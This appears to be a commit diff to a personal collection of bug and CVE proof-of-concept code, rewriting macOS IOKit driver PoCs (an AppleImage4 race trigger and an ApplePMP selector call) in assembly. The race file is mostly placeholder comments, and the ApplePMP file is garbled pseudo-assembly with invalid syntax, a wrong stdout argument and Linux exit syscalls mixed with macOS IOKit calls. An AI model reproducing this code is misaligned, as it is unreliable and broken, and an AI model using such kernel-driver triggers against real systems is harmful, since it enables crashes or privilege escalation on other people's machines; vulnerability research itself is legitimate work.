this is written in assembly

README.md

@@ -1,6 +1,6 @@
 # my_bugs_and_CVE_collection
 
-Collection of my bugs and CVE, with PoC or writeup
+Collection of bugs and CVE, with PoC or writeup rewritten in assembly
 
 | Vulnerabilities/Bugs | writeup | PoC  |
 | -------------------- | ------- | ---- |

img4race.asm

@@ -0,0 +1,50 @@
+section .data
+trigger dd 0
+inputScalar dq 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
+inputScalarCnt dq 1
+inputStruct db 4096 dup(0)
+inputStructCnt dq 0
+outputScalar dq 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
+outputScalarCnt dd 9
+outputStruct db 4096 dup(0)
+outputStructCnt dq 0
+selector dd 1
+
+section .text
+global _start
+
+_start:
+    ; Disable stdout buffering
+    ; Equivalent system call or direct manipulation of stdout buffer
+
+    .loop:
+        ; Equivalent of IOServiceGetMatchingService
+        ; System call to find the service "AppleImage4"
+        ; Check if service == IO_OBJECT_NULL, if so, print error and exit
+
+        ; Equivalent of IOServiceOpen
+        ; System call to open the service, check return value
+
+        ; Print opened service message
+
+        ; Create a new thread that will execute vuln_trigger
+        ; System call to create thread, passing conn as argument
+
+        ; Wait for trigger to be set
+        .wait_trigger:
+            cmp dword [trigger], 0
+            je .wait_trigger
+
+        ; Equivalent of IOConnectCallMethod
+        ; System call to interact with the device/service
+
+        ; Reset trigger
+        mov dword [trigger], 0
+
+        jmp .loop
+
+; vuln_trigger function equivalent
+; This would involve setting the trigger and closing the service connection
+; System calls for thread operation and service connection management
+
+

poc.asm

@@ -0,0 +1,89 @@
+section .data
+    service db "ApplePMP", 0
+    failServiceMsg db "[-] failed to find service", 10, 0
+    failOpenMsg db "[-] failed to open service: %x", 10, 0
+    openServiceMsg db "[+] opened service=0x%x", 10, 0
+    krStatusMsg db "[*] kr 0x%x", 10, 0
+    inputScalar dq 0x17BAA35D8C17BAA
+    inputStruct times 4096 db 0
+    outputScalar times 16 dq 0
+    outputStruct times 4096 db 0
+    selector dd 15
+    inputScalarCnt dd 1
+    outputScalarCnt dd 0
+    inputStructCnt dq 0
+    outputStructCnt dq 0xA
+
+section .bss
+    conn resb 8
+    kr resb 4
+    thread resb 8
+
+section .text
+    global _start
+
+_start:
+    ; Set stdout buffer to NULL
+    mov edi, 0 ; file descriptor 1 for stdout
+    mov rsi, 0 ; NULL pointer for buffer
+    call setbuf
+
+    ; Get service
+    mov rdi, service ; Service name
+    call IOServiceGetMatchingService
+    test rax, rax
+    jz fail_find_service
+
+    mov [conn], rax
+
+    ; Open service
+    mov rdi, [conn]
+    mov rsi, mach_task_self()
+    xor edx, edx ; type = 0
+    lea rcx, [conn]
+    call IOServiceOpen
+    mov [kr], eax
+    test eax, eax
+    jnz fail_open_service
+
+    ; Prepare for IOConnectCallMethod
+    lea rdi, [conn] ; Connection
+    mov esi, [selector] ; Selector
+    lea rdx, [inputScalar] ; Input scalar
+    mov rcx, [inputScalarCnt] ; Input scalar count
+    lea r8, [inputStruct] ; Input structure
+    mov r9, [inputStructCnt] ; Input structure count
+    lea rax, [outputScalar] ; Output scalar
+    push rax
+    lea rax, [outputScalarCnt] ; Output scalar count
+    push rax
+    lea rax, [outputStruct] ; Output structure
+    push rax
+    lea rax, [outputStructCnt] ; Output structure count
+    push rax
+    call IOConnectCallMethod
+    mov [kr], eax
+
+    ; Print kr status
+    mov rdi, krStatusMsg
+    mov rsi, [kr]
+    call printf
+    jmp end
+
+fail_find_service:
+    mov rdi, failServiceMsg
+    call printf
+    jmp end
+
+fail_open_service:
+    mov rdi, failOpenMsg
+    mov rsi, [kr]
+    call printf
+    jmp end
+
+end:
+    mov eax, 60 ; syscall number for exit
+    xor edi, edi ; status 0
+    syscall
+
+